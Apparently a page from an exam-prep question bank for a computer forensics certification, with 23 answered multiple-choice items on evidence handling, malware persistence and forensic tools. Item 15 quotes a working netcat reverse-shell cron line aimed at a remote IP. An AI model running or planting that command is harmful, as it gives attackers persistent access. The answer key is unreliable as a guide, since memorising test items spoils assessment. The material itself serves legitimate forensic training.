Courseiva

Computer Hacking Forensic Investigator CHFI (CHFI) — Questions 1–75

745 questions total · 10pages · All types, answers revealed

Page 1 of 10

Page 2
1
MCQhard

An organization receives a legal hold notice regarding a pending lawsuit. The IT department is instructed to preserve all relevant electronically stored information (ESI). Which of the following actions must be taken FIRST?

A.Perform a full forensic analysis of all systems
B.Notify all employees to delete personal files
C.Immediately suspend any automated data deletion policies
D.Delete all emails older than 30 days to reduce storage
AnswerC

Automated data deletion policies—such as email retention schedules, log rotation, or scripted file cleanup—can irretrievably destroy ESI that is subject to the legal hold, often without human intervention. Immediately suspending those routines stops the clock and preserves the current state of all potentially relevant data, which is the foundational step of a valid litigation hold. This suspension should be documented and disseminated to IT staff to prevent any scheduled jobs from running overnight or at the next backup cycle.

Why this answer

When a legal hold notice is issued, the first priority is to preserve all potentially relevant ESI by immediately suspending any automated data deletion policies (e.g., retention schedules, auto-archiving, or purge scripts). This prevents spoliation of evidence before any collection or analysis begins. Failure to do so could result in sanctions for destroying discoverable data.

Exam trap

EC-Council often tests the misconception that forensic analysis or data collection should be the immediate step, when in fact the legal hold requires first stopping any automated destruction mechanisms to preserve the current state of ESI.

How to eliminate wrong answers

Option A is wrong because a full forensic analysis is a later step in the e-discovery process, not the first action; performing it prematurely could alter data or waste resources before the scope of preservation is defined. Option B is wrong because notifying employees to delete personal files contradicts the legal hold's purpose and could be construed as intentional spoliation; employees should be instructed to preserve all potentially relevant data, not delete anything. Option D is wrong because deleting emails older than 30 days would destroy potentially relevant evidence and directly violate the duty to preserve ESI under the legal hold.

2
Multi-Selecteasy

Which TWO of the following are common persistence mechanisms used by malware on Windows systems? (Select two.)

Select 2 answers
A.USBSTOR registry key
B.Prefetch files
C.Scheduled Tasks
D.LNK files
E.Registry Run keys (e.g., HKLM\Software\Microsoft\Windows\CurrentVersion\Run)
AnswersC, E

Scheduled Tasks let malware register a trigger that launches its payload at logon, boot or on a timer, surviving reboots and often masquerading as legitimate maintenance. This satisfies the persistence requirement by re-establishing execution without user interaction.

Why this answer

Scheduled Tasks (C) are a common persistence mechanism because malware can register a task via schtasks.exe or the Task Scheduler COM API to execute a payload at logon, on a schedule, or on system events, surviving reboots. Registry Run keys (E), such as HKLM\Software\Microsoft\Windows\CurrentVersion\Run and HKCU equivalents, are classic autostart locations that Windows processes at user logon, so malware placed there launches automatically each session. The other options are forensic artifacts rather than persistence methods: USBSTOR records historical USB mass-storage connections, Prefetch files evidence program execution for performance, and LNK files are shortcut artifacts often used for initial execution or user bait, not for maintaining persistence.

Exam trap

EC-Council often tests the distinction between artifacts of execution (like Prefetch and LNK files) and actual persistence mechanisms that cause automatic re-execution, leading candidates to mistakenly select options that indicate malware ran but do not ensure it runs again.

3
MCQmedium

You are a forensic investigator responding to a security incident at a medium-sized company. The incident involved an attacker gaining unauthorized access to a Windows Server 2019 system. The server was taken offline by the IT team immediately after detection. Your task is to acquire forensic evidence from the server's hard drive. The server has a single 500 GB NTFS partition. You have a forensic workstation with a write blocker, a SATA-to-USB adapter, and a forensic imaging tool that supports both dd and EWF (E01) formats. The server is still physically in the server room, and the IT team has powered it off. You need to create a forensic image that preserves the integrity of the evidence and allows for efficient analysis. Which of the following is the most appropriate course of action?

A.Boot the server using a forensic live CD, connect an external USB drive to the server, and use 'dd' to create a raw image on the external drive.
B.Use the server's built-in backup utility to create a system state backup and copy it to a network share.
C.Remove the hard drive, connect it via a write blocker to the forensic workstation, and then use 'dd' over a network connection to send the image to a remote server.
D.Remove the hard drive, connect it via a write blocker to the forensic workstation, and create an EWF (E01) image stored locally on the forensic workstation's internal drive.
AnswerD

A write blocker prevents any modification to the 500 GB NTFS drive during acquisition, preserving evidential integrity. EWF (E01) stores metadata, compression and hashes, supporting efficient analysis and verification, satisfying the requirement to image the powered-off server while maintaining admissibility.

Why this answer

It follows best practices for forensic acquisition: removing the hard drive and connecting it via a write blocker ensures that no data is altered during imaging. Using EWF (E01) format provides compression, metadata, and integrity checks (e.g., CRC32, MD5, SHA-1), which are essential for efficient analysis and evidence preservation. Storing the image locally on the forensic workstation avoids network latency and potential data corruption.

Exam trap

EC-Council often tests the misconception that using a forensic live CD is sufficient for write protection, but without a hardware write blocker, the OS may still write to the drive (e.g., via journaling or mount operations), compromising evidence integrity.

How to eliminate wrong answers

Option A is wrong because booting the server with a forensic live CD and using dd to an external USB drive risks modifying the system's volatile data and does not guarantee write-blocking at the hardware level; the live CD's kernel may still write to the internal drive. Option B is wrong because a system state backup is not a forensic image; it captures only system files and registry, not the entire partition, and it modifies the original drive during the backup process. Option C is wrong because using dd over a network connection introduces potential data integrity issues due to network latency, packet loss, or interception, and it is less efficient than local storage; the image should be stored on a trusted forensic workstation drive.

4
MCQhard

An analyst runs 'regshot' before and after executing a suspicious binary. The report shows that the binary added a value to HKLM\SYSTEM\CurrentControlSet\Services\MyService with 'ImagePath' pointing to C:\Windows\system32\malware.exe and 'Start' set to 2. What is the MOST likely purpose?

A.Hiding network connections
B.Encrypting files
C.Disabling a legitimate service
D.Persistence as a service
AnswerD

The Start value of 2 (SERVICE_AUTO_START) in a newly created service registry key instructs the Service Control Manager to launch the service automatically during system startup, before a user logs on. This is a well-known persistence technique because the malicious binary is executed with SYSTEM privileges on every boot, surviving reboots. The presence of this service key, with its image path pointing to the suspect executable, is direct evidence that the malware has installed a persistent service. This matches the observed change exactly and explains why the analyst sees a new service entry rather than a modification to an existing one.

Why this answer

The binary added a service entry under HKLM\SYSTEM\CurrentControlSet\Services\MyService with 'ImagePath' pointing to malware.exe and 'Start' set to 2 (SERVICE_AUTO_START). This ensures the malware launches automatically at system boot, which is a classic persistence mechanism. The 'Start' value of 2 specifically configures the service to start automatically, making it persist across reboots.

Exam trap

EC-Council often tests the distinction between creating a new service for persistence versus modifying an existing service's startup type or disabling it, and candidates may confuse the 'Start' value of 2 (auto-start) with a disabled state (value 4).

How to eliminate wrong answers

Option A is wrong because hiding network connections is typically achieved by rootkits, API hooking, or manipulating network stack components (e.g., NDIS drivers), not by simply adding a service entry. Option B is wrong because encrypting files is a ransomware behavior that would involve file system operations or cryptographic API calls, not merely creating a service with an ImagePath. Option C is wrong because disabling a legitimate service would involve modifying the 'Start' value of an existing service (e.g., setting it to 4 for disabled) or deleting it, not creating a new service with a malicious ImagePath.

5
MCQmedium

During an iOS forensic examination, an analyst extracts the iTunes backup of a suspect iPhone. The analyst wants to review deleted SMS messages. Which SQLite database file should be examined?

A.AddressBook.db
B.Keyboard.db
C.SMS.db
D.call_history.db
AnswerC

This is the primary database in iOS that stores both SMS (via cellular) and iMessage (via Apple's push service) conversations. It contains tables such as 'message' and 'chat' that record the full message text, timestamps (in Apple's Core Data format), phone numbers/identifiers, and flags for read/delivered status. Even deleted messages can sometimes be recovered from unused or free pages within the SQLite file until those blocks are overwritten, making it the key artifact for forensic message analysis.

Why this answer

In iOS forensics, deleted SMS messages are stored in the SMS.db SQLite database located within the iTunes backup. This database contains the `message` table, which retains deleted messages until overwritten by new data, making it the primary target for recovering deleted iMessages and SMS texts.

Exam trap

EC-Council often tests the misconception that deleted SMS messages are stored in a separate 'deleted items' database or that call_history.db contains SMS data, leading candidates to overlook the primary SMS.db file.

How to eliminate wrong answers

Option A is wrong because AddressBook.db stores contact information (names, phone numbers, emails), not SMS message content. Option B is wrong because Keyboard.db stores keyboard usage data (e.g., learned words, autocorrect entries), not SMS messages. Option D is wrong because call_history.db contains call logs (incoming, outgoing, missed calls), not SMS text messages.

6
MCQhard

During malware analysis, an analyst discovers that a sample uses a technique to modify its own code at runtime to evade signature detection. Which anti-forensic technique does this describe?

A.Log wiping
B.Packing/Obfuscation
C.Encryption
D.Timestomping
AnswerB

Self-modifying code is a hallmark of packing and obfuscation, as malicious samples often decrypt, decompress, or rewrite their own instruction stream in memory before execution. This runtime mutation is exactly what packers like UPX or custom crypters achieve by using a stub that unpacks the original code into memory, so the on-disk representation appears static while the executing image evolves. Such behavior directly matches the analyst's observation, making packing/obfuscation the correct answer because the code's self-modification is a deliberate obfuscation technique designed to evade static signatures and hinder analysis.

Why this answer

The technique of modifying code at runtime to evade signature detection is known as packing or obfuscation. Packers compress or encrypt the original executable and wrap it with a small stub that decompresses or decrypts the code in memory during execution, thereby altering the static file signature. This runtime modification allows the malware to bypass signature-based antivirus and forensic tools that rely on static analysis of the binary on disk.

Exam trap

The CHFI exam often tests the distinction between encryption as a general concept and packing/obfuscation as a specific anti-forensic technique that combines encryption with runtime code modification to evade static signature detection.

How to eliminate wrong answers

Option A is wrong because log wiping refers to the deliberate deletion or alteration of system, application, or security logs (e.g., clearing Windows Event Logs or /var/log/messages) to cover tracks, not to modifying code at runtime. Option C is wrong because encryption, while used in packing, is a broader cryptographic concept that protects data confidentiality; the specific anti-forensic technique described here is packing/obfuscation, which combines encryption/compression with a runtime stub to alter the executable's static signature. Option D is wrong because timestomping is the act of modifying file timestamps (e.g., using SetFileTime on Windows or touch -t on Linux) to mislead timeline analysis, not modifying code at runtime.

7
Multi-Selecthard

Which THREE of the following are steps in the forensic investigation process? (Select three.)

Select 3 answers
A.Analysis
B.Sentencing
C.Reporting
D.First response
E.Deletion of irrelevant data
AnswersA, C, D

Analysis is the systematic examination of digital evidence after acquisition, where the investigator correlates data, recovers deleted artifacts, validates hash values, and tests hypotheses to reconstruct the incident. In the forensic process, this phase transforms raw data into actionable intelligence, applying techniques like keyword searching, timeline analysis, and file signature verification. It is a core investigative step, distinct from later reporting, because its output forms the evidentiary basis for conclusions.

Why this answer

In the forensic investigation process, First response (D) is the initial step where the investigator secures the scene, preserves volatile evidence, and documents the state of systems to prevent contamination. Analysis (A) follows, where the collected data is examined using validated tools and techniques to reconstruct events and identify artifacts relevant to the incident. Reporting (C) is the final phase, where findings, methods, and conclusions are documented in a clear, defensible manner suitable for legal or administrative proceedings.

Sentencing (B) is a judicial action that occurs after a trial, not part of the forensic investigation itself, and Deletion of irrelevant data (E) is not a recognized step—forensic examiners preserve all potential evidence and may filter for relevance during analysis, but never delete data as part of the process.

Exam trap

EC-Council often tests the distinction between the forensic investigation process and the broader legal or judicial process, leading candidates to mistakenly include post-investigation actions like sentencing as a forensic step.

8
MCQmedium

A security analyst arrives at a suspected computer crime scene. The computer is on and a user is logged in. The analyst needs to preserve volatile data. According to first responder duties, what should the analyst do FIRST?

A.Immediately unplug the power cord to prevent data alteration
B.Create a forensic image of the hard drive using a write blocker
C.Photograph the scene and document everything
D.Capture volatile data such as running processes and network connections
AnswerD

Volatile data must be captured before powering off because it is lost when the system loses power.

Why this answer

The first responder's priority is to preserve volatile data, which is lost when the system is powered off. Volatile data includes running processes, network connections, and memory contents, which must be captured before any other action. This aligns with the order of volatility (RFC 3227) and standard forensic procedures.

Exam trap

The CHFI exam often tests the misconception that preserving the hard drive (Option A or B) is the top priority, but the trap is that volatile data is more fragile and must be captured first to avoid losing critical evidence like active network connections or malware in memory.

How to eliminate wrong answers

Option A is wrong because immediately unplugging the power cord destroys volatile data in RAM and active network connections, violating the order of volatility. Option B is wrong because creating a forensic image of the hard drive is a non-volatile data acquisition step that should occur after volatile data capture, and using a write blocker is irrelevant for volatile data. Option C is wrong because while photographing and documenting the scene is important, it is not the first action; volatile data must be captured immediately before it is lost.

9
Multi-Selecteasy

Which TWO of the following are tools that can be used for timeline analysis in digital forensics?

Select 2 answers
A.Wireshark
B.Nmap
C.log2timeline
D.FTK Imager
E.Plaso
AnswersC, E

log2timeline aggregates timestamped artefacts from filesystems, registry hives, browser histories and logs into a single chronological bodyfile, directly satisfying the stem's timeline-analysis requirement. Its super-timeline output lets investigators correlate events across disparate sources, which is precisely the capability the question demands.

Why this answer

log2timeline (C) is correct because it is the original Perl-based tool designed to parse many artifact sources and generate a bodyfile of timestamped events, which is the foundational step of building a forensic timeline. Plaso (E) is correct because it is the successor to log2timeline, and its psort.py utility correlates and sorts the parsed events into a super-timeline for chronological analysis. Wireshark (A) is a network protocol analyzer for capturing and inspecting packet traffic, not a timeline generator.

Nmap (B) is a network discovery and port-scanning tool used for host and service enumeration. FTK Imager (D) is an imaging and preview tool for acquiring and browsing forensic images, not a timeline analysis tool.

Exam trap

EC-Council often tests the distinction between tools used for network analysis (Wireshark, Nmap) versus tools used for host-based timeline analysis (log2timeline, Plaso), leading candidates to confuse packet capture utilities with forensic timeline generators.

10
MCQhard

An examiner acquires a full file system image from an Android device running Android 11. While parsing the image, they need to identify which application was used to send a specific SMS message that was deleted shortly after being sent. The device uses Google Messages as the default SMS app. Which artefact location is MOST likely to contain remnants of the deleted SMS content?

A.The mmssms.db SQLite database in /data/data/com.android.providers.telephony/databases/
B.The WhatsApp msgstore.db in /data/data/com.whatsapp/databases/
C.The contacts2.db database in /data/data/com.android.providers.contacts/databases/
D.The com.google.android.gms database in /data/data/com.google.android.gms/databases/
AnswerA

The mmssms.db database stores SMS and MMS messages for the default messaging provider. Even when a message is deleted from the user interface, the underlying SQLite pages may retain deleted records until vacuumed. Google Messages writes to this provider database, so remnants of the deleted SMS can often be carved from freelist pages or recovered via WAL/journal files, making this the most direct artefact for the scenario.

Why this answer

SMS messages on Android are stored by the telephony provider in mmssms.db, regardless of which messaging app is used as the default. When a message is deleted, the SQLite record may remain in freelist pages or write-ahead log files until a vacuum operation occurs. The examiner should target this database and attempt carving or journal analysis to recover the deleted content.

Other databases serve different purposes and would not contain the SMS body.

Exam trap

The trap here is assuming that because Google Messages is a Google app, its data resides in a Google-specific database rather than the standard Android telephony provider.

11
MCQmedium

A first responder arrives at a scene where a computer is suspected to contain evidence of fraud. The computer is turned on and a file is open. Which of the following actions should the responder AVOID?

A.Photographing the screen and documenting open windows.
B.Double-clicking the open file to fully view its contents.
C.Noting the time and date from the system clock.
D.Using a hardware write blocker to image the hard drive after shutdown.
AnswerB

Double-clicking the open file is a direct violation of forensic preservation principles. The OS will update the file's last-accessed timestamp, and potentially its last-modified metadata, while the associated application may spawn temporary files, alter the file's content, or trigger network activity. Any such change destroys the original state and taints the evidence, making later analysis and court presentation unreliable.

Why this answer

Double-clicking the open file alters its last accessed timestamp and may modify file metadata (e.g., NTFS $STANDARD_INFORMATION or $FILE_NAME attributes), potentially destroying volatile evidence. It also risks executing malicious code or changing the file's content if the application auto-saves. The first responder must preserve the current state and capture a forensic image before any interaction with active data.

Exam trap

The CHFI exam often tests the misconception that 'viewing' an open file is harmless, when in fact any interaction with the file system (even a double-click) changes metadata and risks evidence spoliation.

How to eliminate wrong answers

Option A is wrong because photographing the screen and documenting open windows is a standard first step to capture volatile evidence (e.g., running processes, open files) without altering the system state. Option C is wrong because noting the time and date from the system clock is essential for establishing a timeline and comparing against network logs or other sources; it does not modify evidence. Option D is wrong because using a hardware write blocker to image the hard drive after a controlled shutdown is a proper forensic procedure that preserves the integrity of the storage media.

12
MCQmedium

During a forensic investigation of a compromised Linux server, an analyst checks /var/log/auth.log and finds multiple entries like "Failed password for root from 10.0.0.5 port 22 ssh2". Which tool is BEST suited to analyze the timeline of these events?

A.Nmap
B.Wireshark
C.log2timeline
D.Autopsy
AnswerC

log2timeline parses diverse log and artefact sources into a unified chronological bodyfile, letting the analyst correlate the repeated SSH authentication failures from 10.0.0.5 against other system events. This satisfies the requirement to analyse event timeline ordering, not merely read entries.

Why this answer

C is correct because log2timeline (part of the Plaso framework) is specifically designed to parse multiple log sources, including /var/log/auth.log, and create a super timeline that correlates events by timestamp. This allows the analyst to reconstruct the exact sequence of failed SSH login attempts from 10.0.0.5, which is essential for timeline analysis in forensic investigations.

Exam trap

The EC-Council CHFI exam often tests the distinction between network analysis tools (Nmap, Wireshark) and forensic timeline tools (log2timeline), trapping candidates who confuse packet-level analysis with log-based event correlation.

How to eliminate wrong answers

Option A is wrong because Nmap is a network scanning tool used to discover hosts and services, not to analyze log file timestamps or event timelines. Option B is wrong because Wireshark is a packet capture and analysis tool that inspects live or recorded network traffic, not static log files like /var/log/auth.log. Option D is wrong because Autopsy is a digital forensics platform for disk image analysis and file system forensics, but it lacks native capability to parse and correlate syslog/auth.log entries into a unified timeline without additional plugins or manual import.

13
MCQhard

A forensic analyst is examining a malware sample that uses packing to obfuscate its code. Which static analysis tool is BEST suited to identify the packer used and potentially unpack the executable?

A.PEiD
B.Cuckoo Sandbox
C.Ghidra
D.IDA Pro
AnswerA

PEiD uses signatures to detect packers, cryptors, and compilers. It can also assist in unpacking by identifying the entry point.

Why this answer

PEiD (Portable Executable Identifier) is specifically designed to detect packers, cryptors, and compilers used in PE files by scanning for known signatures in the executable's entry point. It is the best static analysis tool for identifying the packer and can often unpack the executable using its built-in generic unpacker or by invoking the packer's own unpacking stub. This makes it ideal for the initial triage of packed malware samples.

Exam trap

EC-Council often tests the distinction between static and dynamic analysis tools, and the trap here is that candidates may confuse a dynamic analysis sandbox (Cuckoo) or a general-purpose disassembler (Ghidra, IDA Pro) with a specialized static packer identifier like PEiD.

How to eliminate wrong answers

Option B is wrong because Cuckoo Sandbox is a dynamic analysis tool that executes the malware in a controlled environment to observe behavior, not a static analysis tool for identifying packers. Option C is wrong because Ghidra is a reverse engineering framework focused on disassembly and decompilation, but it lacks a dedicated packer signature database and automated unpacking capabilities like PEiD. Option D is wrong because IDA Pro is a powerful interactive disassembler and debugger, but it does not have a built-in packer identification database; while plugins can add this functionality, it is not the best-suited tool out of the box for this specific task.

14
Multi-Selectmedium

A forensic analyst is examining a Mac system for evidence of malicious activity. Which THREE artifacts are commonly analyzed in macOS forensics?

Select 3 answers
A.Prefetch files
B.bash_history
C.Unified logging
D.FSEvents
E..plist files
AnswersC, D, E

Unified logging is the core of macOS system and application data collection, introduced in macOS Sierra (10.12). It stores structured logs in a binary format under /private/var/db/diagnostics/ and can be queried using the log command to filter by process, time, and predicate. Unlike other options, it offers a centralized, tamper-evident record of system behavior, making it the strongest choice for forensic investigation.

Why this answer

macOS forensics frequently examines unified logs (for system events), .plist files (for configuration and application data), and FSEvents (for file system change history). bash_history is not the default for macOS (zsh is default). Prefetch files are Windows-only.

15
MCQmedium

An incident responder finds the following entry in a Linux cron job: "*/5 * * * * root nc -e /bin/sh 10.0.0.5 4444". What is the purpose of this cron job?

A.Port scan 10.0.0.5 every 5 minutes
B.Establish a reverse shell back to the attacker every 5 minutes
C.Log system activity to a remote server
D.Download malicious software from 10.0.0.5
AnswerB

The nc command with -e /bin/sh pipes a shell to the remote host, and the cron schedule runs it every five minutes. This establishes a recurring reverse shell, giving the attacker persistent interactive access to the compromised Linux system.

Why this answer

The cron job runs every 5 minutes (as specified by '*/5') and executes 'nc -e /bin/sh 10.0.0.5 4444'. The '-e' flag in netcat (nc) binds /bin/sh to the connection, meaning when the command runs, it connects to 10.0.0.5 on port 4444 and provides a shell to the remote listener. This is a classic reverse shell technique, allowing an attacker to gain interactive command execution on the compromised Linux host.

Exam trap

In EC-CHFI, the distinction between a reverse shell and a bind shell is key; here the trap is confusing the '-e' flag (which executes a program on connection) with a download or scan operation, leading candidates to overlook the shell execution aspect.

How to eliminate wrong answers

Option A is wrong because the command does not perform a port scan; netcat with '-e' is used for shell binding, not for scanning ports (which would require flags like '-z' or '-v'). Option C is wrong because there is no logging mechanism involved; the command does not redirect output to a log file or use syslog, and the remote server is receiving a shell, not log data. Option D is wrong because the command does not download any file; it establishes an interactive shell session, and there is no transfer of malicious software via wget, curl, or similar.

16
Multi-Selectmedium

A forensic analyst is investigating a compromised Linux server running an ext4 file system. The analyst suspects the attacker deleted critical log files (e.g., /var/log/auth.log) and wants to recover them. Which TWO techniques would be MOST effective for recovering the deleted files?

Select 2 answers
A.Running `extundelete` on the partition
B.Checking the `.Trash-1000` folder
C.Using `foremost` to perform file carving based on headers and footers
D.Restoring from the `lost+found` directory
E.Executing `dd if=/dev/sda1 of=image.dd` and analyzing with `strings`
AnswersA, C

Running `extundelete` on the partition is the correct approach because extundelete parses the ext3/ext4 journal to locate inodes and data blocks that were marked free after deletion, enabling reconstruction of the original file content even without filesystem metadata. Since system logs are typically removed with `rm`, which bypasses any trash mechanism, the journal often retains enough information to recover them—provided the partition is unmounted or mounted read-only to prevent subsequent writes from overwriting the freed blocks. This makes extundelete the most direct and appropriate forensic recovery method for deleted log files on an ext3/ext4 Linux server.

Why this answer

Option A is correct because `extundelete` is a specialized utility designed for ext3/ext4 file systems that reads the journal and inode tables to locate and restore recently deleted files, making it ideal for recovering deleted logs like /var/log/auth.log on an ext4 partition. Option C is correct because `foremost` performs file carving by scanning raw disk data for known file headers and footers, which can recover deleted files even when file system metadata (inodes) has been overwritten or is unavailable. Option B is incorrect because `.Trash-1000` is a per-user trash directory used by desktop environments, not a system-wide recovery location, and root-owned logs deleted by an attacker would not be moved there.

Option D is incorrect because `lost+found` is used by fsck to reconnect orphaned inodes (files with intact metadata but no directory entry), not to recover files whose inodes were freed upon deletion. Option E is incorrect because `dd` merely creates a bit-for-bit image and `strings` only extracts printable character sequences; neither reconstructs deleted files or their metadata, so this approach is not an effective recovery technique.

Exam trap

The EC-Council CHFI exam often tests the distinction between file system-specific recovery tools (like `extundelete`) and generic file carving tools (like `foremost`), and candidates mistakenly choose `lost+found` thinking it stores all deleted files, when it only holds files recovered from file system corruption.

17
MCQmedium

During a forensic examination of a Windows system, an analyst runs the Volatility plugin `netscan` on a memory dump. What information does this plugin primarily provide?

A.Network connections and listening sockets with associated processes
B.Open files and handles for each process
C.List of all running processes and their parent processes
D.The contents of the Windows firewall rules
AnswerA

This is correct because Volatility's netscan plugin specifically scans physical memory for Windows network structures, including TCP endpoints, TCP listeners, UDP endpoints, and UDP listeners. It pairs each socket with its owning process ID (PID) by traversing the _TCP_ENDPOINT, _TCP_LISTENER, and _UDP_ENDPOINT kernel structures. Thus it directly reveals active network connections and listening sockets along with the processes bound to them, which is the intended forensic artifact for network-related memory analysis.

Why this answer

The Volatility plugin `netscan` is specifically designed to extract network connection information from Windows memory dumps, including active TCP and UDP connections, listening sockets, and the associated processes that own them. It works by scanning kernel data structures such as `_TCPT_OBJECT` and `_UDP_OBJECT` to provide a snapshot of network activity at the time of capture, which is critical for identifying malicious connections or unauthorized services.

Exam trap

The EC-CHFI exam often tests the distinction between memory forensics plugins, and the trap here is that candidates confuse `netscan` with `pslist` or `handles`, assuming it provides process lists or file handles instead of network socket data.

How to eliminate wrong answers

Option B is wrong because open files and handles for each process are enumerated by the `handles` or `filescan` plugins, not `netscan`. Option C is wrong because listing all running processes and their parent processes is the function of the `pstree` or `pslist` plugins, which traverse the EPROCESS block list. Option D is wrong because Windows firewall rules are stored in the registry (e.g., `SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy`) and are not directly parsed by `netscan`, which focuses on network socket objects rather than policy configurations.

18
MCQmedium

A forensic examiner needs to verify the integrity of a forensic image after acquisition. Which of the following methods is the MOST reliable for ensuring the image has not been altered?

A.Opening the image in a hex editor and visually inspecting the first few bytes.
B.Using the 'dir' command to list files and compare timestamps.
C.Calculating and comparing hash values (e.g., MD5 or SHA-1) of the original and the image.
D.Comparing file sizes of the original drive and the image.
AnswerC

Calculating and comparing cryptographic hash values (e.g., MD5 or SHA-1) is the forensic standard for verifying that an acquired image is bit-for-bit identical to the original source. A hash function processes the entire data stream and produces a fixed-size digest; any change to even a single bit in the source will produce a drastically different hash value. This provides strong assurance of integrity (though not authenticity) and is the accepted method in forensic imaging tools such as FTK Imager, EnCase, and dd with hash options.

Why this answer

Cryptographic hash functions like MD5 or SHA-1 produce a fixed-size digest that is uniquely tied to the data content. By comparing the hash of the original drive (or its bit-for-bit copy) with the hash of the forensic image, any single bit change in the image will result in a completely different hash value, providing mathematically strong integrity verification. This is the standard method recommended in forensic best practices (e.g., NIST SP 800-86) and is far more reliable than any metadata or size comparison.

Exam trap

The CHFI exam often tests the misconception that file metadata or size comparisons are sufficient for integrity verification, when in fact only cryptographic hashing provides content-level assurance against tampering.

How to eliminate wrong answers

Option A is wrong because visually inspecting the first few bytes in a hex editor only checks a tiny fraction of the data; any alteration elsewhere in the image would go undetected. Option B is wrong because the 'dir' command lists file metadata (names, timestamps, sizes) from the filesystem, which does not verify the underlying raw data integrity; timestamps can be modified without changing the actual file content, and the command does not examine unallocated space or slack space. Option D is wrong because comparing file sizes only ensures the total byte count matches; an attacker could replace data with different content of the same size (e.g., swapping files or padding data) without changing the size, so size alone provides no cryptographic assurance.

19
MCQeasy

A security analyst is investigating a compromised Windows server and wants to capture the contents of RAM for analysis. Which of the following tools is specifically designed for this purpose?

A.Foremost
B.WinPmem
C.Volatility
D.FTK Imager
AnswerB

WinPmem is a kernel-mode memory acquisition driver that provides a raw, bit-for-bit capture of physical memory on Windows systems, including the PFN database and kernel structures. It is specifically designed for forensic acquisition, with options for page-table manipulation to bypass some anti-forensic techniques and produce a memory image compatible with Volatility and other analyzers. Its low-level access to RAM makes it the standard choice on a live compromised server.

Why this answer

WinPmem is a dedicated memory acquisition tool designed to capture the contents of RAM from a live Windows system. It creates a raw memory dump file that can be analyzed with tools like Volatility, making it the correct choice for this forensic task.

Exam trap

The trap here is that candidates confuse FTK Imager's ability to capture a physical memory dump (via its 'Capture Memory' option) with it being the primary tool for this task, but WinPmem is the tool specifically designed and optimized for live RAM acquisition in forensic contexts.

How to eliminate wrong answers

Option A is wrong because Foremost is a file carving tool used to recover deleted files from disk images, not a memory acquisition tool. Option C is wrong because Volatility is a memory analysis framework used to examine RAM dumps, not to capture them. Option D is wrong because FTK Imager is primarily a disk imaging and forensic acquisition tool; while it can capture a pagefile or a physical memory dump on some systems, it is not specifically designed for live RAM capture and lacks the robust memory acquisition capabilities of WinPmem.

20
MCQmedium

An investigator examining a compromised web server finds a file named shell.aspx in the uploads directory. The file contains code that accepts commands via HTTP POST and executes them on the server. What is the MOST likely type of attack?

A.Server-side request forgery (SSRF)
B.SQL injection
C.Webshell
D.Cross-site request forgery (CSRF)
AnswerC

A webshell is a script uploaded to a web server that accepts commands over HTTP and executes them on the host, giving the attacker remote control. The .aspx extension and POST-based command execution match this pattern exactly.

Why this answer

The file shell.aspx contains code that accepts commands via HTTP POST and executes them on the server, which is the classic definition of a webshell. A webshell is a malicious script uploaded to a web server that provides an attacker with remote command execution capabilities, often used for persistence and post-exploitation activities.

Exam trap

EC-Council often tests the distinction between attacks that involve direct server-side code execution (webshell) versus attacks that manipulate other systems or users (SSRF, CSRF) or exploit database layers (SQL injection), so candidates must focus on the presence of an uploaded executable script file.

How to eliminate wrong answers

Option A is wrong because Server-Side Request Forgery (SSRF) involves the server making requests to internal or external resources on behalf of the attacker, not executing arbitrary commands via a file in the uploads directory. Option B is wrong because SQL injection exploits vulnerabilities in database queries, not the execution of system commands through an uploaded script file. Option D is wrong because Cross-Site Request Forgery (CSRF) tricks a user's browser into performing unintended actions on a trusted site, not directly executing commands on the server via an uploaded file.

21
MCQeasy

A forensic investigator is preparing to acquire a USB flash drive that is suspected to contain evidence of intellectual property theft. The investigator needs to ensure that the acquisition process does not alter any data on the flash drive. Which of the following should the investigator use?

A.A software write blocker
B.A hardware write blocker
C.The 'dd' command with the 'if' and 'of' parameters
D.A USB hub with power management
AnswerB

A hardware write blocker prevents any write commands from reaching the USB flash drive, ensuring that the data remains unaltered. It is a physical device that intercepts and blocks writes at the hardware level, providing strong protection against accidental modification. This is the standard tool for forensic acquisition to maintain evidential integrity.

Why this answer

A hardware write blocker is the most reliable way to prevent any writes to the USB flash drive during acquisition. It physically intercepts write commands, ensuring the drive remains unaltered. Software write blockers and 'dd' do not offer the same level of guaranteed protection, and a USB hub has no write-blocking capability.

Therefore, a hardware write blocker is the correct choice.

Exam trap

The trap here is assuming that a software write blocker or 'dd' command provides the same level of protection as a hardware write blocker, but only a hardware blocker physically prevents writes.

22
MCQhard

A security analyst runs the command `regshot64.exe compare` after executing malware. Regshot reports that the following registry key was created: `HKCU\Software\Microsoft\Windows\CurrentVersion\Run\SecureUpdate`. Which conclusion is MOST likely?

A.The malware encrypted the user's documents
B.The malware installed a persistence mechanism
C.The malware deleted a system file
D.The malware modified a network configuration
AnswerB

A persistence mechanism is commonly implemented by creating a value under HKCU\Software\Microsoft\Windows\CurrentVersion\Run or the corresponding HKLM key. When regshot64.exe compare shows a new 'Run' value pointing to a suspicious executable, that is direct evidence the malware installed an auto-start mechanism. Registry modifications of this type are exactly what regshot is designed to detect, so this is the correct conclusion.

Why this answer

The registry key `HKCU\Software\Microsoft\Windows\CurrentVersion\Run\SecureUpdate` is a standard Windows Run key, which automatically executes the specified program at user logon. By creating this key, the malware ensures it runs every time the user logs in, establishing persistence. This is a classic persistence mechanism, not an action related to encryption, file deletion, or network changes.

Exam trap

The CHFI exam often tests the distinction between persistence mechanisms (like Run keys) and other malware behaviors (like encryption or network changes), trapping candidates who assume any registry change indicates data destruction or system modification rather than survival.

How to eliminate wrong answers

Option A is wrong because encryption of user documents would typically involve file system changes (e.g., appending .encrypted extensions) or cryptographic API calls, not the creation of a Run registry key. Option C is wrong because deleting a system file would leave evidence in file system logs or cause immediate system instability, not create a Run key for persistence. Option D is wrong because modifying a network configuration (e.g., changing DNS settings, proxy, or firewall rules) involves different registry paths (e.g., `HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters`) or netsh commands, not the user-level Run key.

23
MCQeasy

Which Windows Event ID is generated when a service is installed on a system?

A.4624
B.7045
C.4688
D.4720
AnswerB

Event ID 7045 is a System log event generated by the Service Control Manager (SCM) when a new service is installed or registered on a Windows host. It records the service name, executable path, service type, and start type, and is the definitive artifact that identifies service installation, even if the service binary is later removed. This event appears in the System log and can be correlated with Process Creation event 4688 to trace which process launched the installation command.

Why this answer

Event ID 7045 is logged in the Windows System event log when a new service is installed on the system. This event records the service name, image path, service type, and start mode, making it a critical artifact for forensic investigators tracking unauthorized service installations.

Exam trap

